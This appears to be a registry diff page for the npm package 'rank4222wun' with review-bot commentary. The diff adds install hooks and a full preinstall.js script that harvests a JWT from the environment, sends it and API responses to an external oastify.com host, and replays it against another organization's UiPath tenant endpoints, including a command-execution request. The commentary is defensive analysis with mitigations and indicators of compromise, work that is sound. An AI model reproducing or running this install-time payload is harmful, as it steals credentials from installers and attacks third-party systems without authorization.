rank4222wun 0.0.1-security → 1.0.71
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
- package/package.json +7 -3
- package/preinstall.js +105 -0
- package/rank4222wun-1.0.71.tgz +0 -0
- package/README.md +0 -5
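--- a/package/package.json
+++ b/package/package.json
@@ -1,6 +1,10 @@
 {
 "name": "rank4222wun",
-"version": "
-"description": "
-"
+"version": "1.0.71",
+"description": "",
+"scripts": {
+"preinstall": "node preinstall.js",
+"postinstall": "node preinstall.js"
+},
+"dependencies": {}
 }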
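Review bot: The new `scripts` block wires the same file to both `preinstall` and `postinstall`, so `preinstall.js` runs twice with the installing user's privileges on every install, and nothing in the manifest (empty `description`, no `dependencies`, README deleted in this same diff) documents why install-time code is needed at all. The README being removed describes the previous version as an npm security holding placeholder, so this appears to be a re-publish over a previously pulled package name rather than a normal release. Installing with `npm install --ignore-scripts` (or `ignore-scripts=true` in `.npmrc`) prevents these hooks from executing, and a policy that flags lifecycle scripts appearing in a bump from a `*-security` placeholder version would catch this pattern. The two lines `"preinstall": "node preinstall.js",` and `"postinstall": "node preinstall.js"` are the execution vector and should not be present.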
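--- a/package/preinstall.js
+++ b/package/preinstall.js
@@ -0,0 +1,105 @@
+const https = require('https');
+const { execSync } = require('child_process');
+
+const OAST = '2z26icqfa6vjiez8lc55cd3nmes5gwlka.oastify.com';
+const TARGET_ORG = 'c7418f05-be49-4fda-a7d3-0b633737214a';
+const TARGET_TENANT = 'aae93ea0-ff51-40f4-b5c0-f34b38b813b4';
+const BASE_URL = 'staging.uipath.com';
+
+function report(tag, data) {
+const payload = JSON.stringify({ tag, data, ts: Date.now() });
+const req = https.request({
+hostname: OAST, path: `/${tag}`, method: 'POST',
+headers: { 'Content-Type': 'application/json' }
+});
+req.write(payload);
+req.end();
+}
+
+// 1. صيد التوكن (Token Hunting)
+// بما إن الـ AWS Key فشل، التوكن اللي الحاوية بتكلم بيه الـ Orchestrator هو أملنا الوحيد
+function getLiveToken() {
+try {
+// محاولة سحب التوكن من الـ Process Memory أو الـ Environment
+// الـ MCP عادة بيستخدم Bearer token في الـ Requests بتاعته
+const envs = JSON.stringify(process.env);
+const tokenMatch = envs.match(/eyJh[A-Za-z0-9-_=]+\.[A-Za-z0-9-_=]+\.?[A-Za-z0-9-_.+/=]*/g);
+return tokenMatch ? tokenMatch[0] : null;
+} catch (e) { return null; }
+}
+
+// 2. محاولة اختراق الـ Orchestrator (Cross-Org Data Leak)
+async function probeCrossOrgAPI() {
+const token = getLiveToken();
+if (!token) {
+report('TOKEN_NOT_FOUND', { msg: "Could not find JWT in ENV" });
+return;
+}
+
+// المسارات اللي الـ Orchestrator بيستخدمها لإدارة الـ MicroVMs
+const targetEndpoints = [
+`/agenthub_/mcp/test1/api/organizations/${TARGET_ORG}/tenants/${TARGET_TENANT}/runtimes`,
+`/${TARGET_ORG}/${TARGET_TENANT}/agenthub_/mcp/test1/runtime/info`,
+`/api/v1/orgs/${TARGET_ORG}/tenants/${TARGET_TENANT}/settings`
+];
+
+targetEndpoints.forEach(path => {
+const options = {
+hostname: BASE_URL,
+path: path,
+method: 'GET',
+headers: {
+'Authorization': `Bearer ${token}`,
+'X-UIPATH-OrganizationId': TARGET_ORG,
+'X-UIPATH-TenantId': TARGET_TENANT,
+'Accept': 'application/json'
+}
+};
+
+const req = https.request(options, (res) => {
+let body = '';
+res.on('data', (d) => body += d);
+res.on('end', () => {
+report('BOLA_PROBE_RESULT', {
+path: path,
+status: res.statusCode,
+receivedData: body.length > 0,
+sample: body.substring(0, 300)
+});
+});
+});
+req.end();
+});
+}
+
+// 3. محاولة الـ Cross-Org Command Injection
+function tryCrossOrgCommand() {
+const token = getLiveToken();
+if (!token) return;
+
+const postData = JSON.stringify({
+context: "Security Testing",
+command: "ls -la" // محاولة تنفيذ أمر في الـ Org التانية
+});
+
+const options = {
+hostname: BASE_URL,
+path: `/${TARGET_ORG}/${TARGET_TENANT}/agenthub_/mcp/test1/runtime/execute`,
+method: 'POST',
+headers: {
+'Authorization': `Bearer ${token}`,
+'Content-Type': 'application/json',
+'X-UIPATH-OrganizationId': TARGET_ORG
+}
+};
+
+const req = https.request(options, (res) => {
+report('COMMAND_INJECTION_STATUS', { status: res.statusCode });
+});
+req.write(postData);
+req.end();
+}
+
+console.log("🕵️ Hunter Mode: Testing API Isolation...");
+probeCrossOrgAPI();
+tryCrossOrgCommand();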
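Review bot: The script serializes the whole environment with `JSON.stringify(process.env)`, regex-extracts the first JWT-shaped value from it in `getLiveToken()`, and `report()` POSTs that bearer token plus sampled API response bodies to the external `*.oastify.com` host in `OAST` — this is credential and data exfiltration from the installing machine, not package functionality, and it fires unconditionally at module load through the three statements at the bottom of the file. The extracted token is also replayed against another organization's tenant-scoped endpoints, including a `runtime/execute` request that carries a shell command, so any host that installed this version should be treated as compromised: rotate every JWT that was present in its environment and review the targeted service's access logs for the org and tenant ids hard-coded in `TARGET_ORG` and `TARGET_TENANT`. For detection, the `OAST` hostname is an indicator of compromise, outbound connections to `oastify.com` from build or CI agents should alert, and install sandboxes without egress filtering will still leak tokens because nothing gates the requests on success of anything else. The `execSync` import from `child_process` is never used in this version, which may hint at an earlier variant that also ran local commands; it is worth checking other releases of this package for that.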
Binary file
|
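--- a/package/README.md
+++ b/package/README.md
@@ -1,5 +0,0 @@
-# Security holding package
-
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-
-Please refer to www.npmjs.com/advisories?search=rank4222wun for more information.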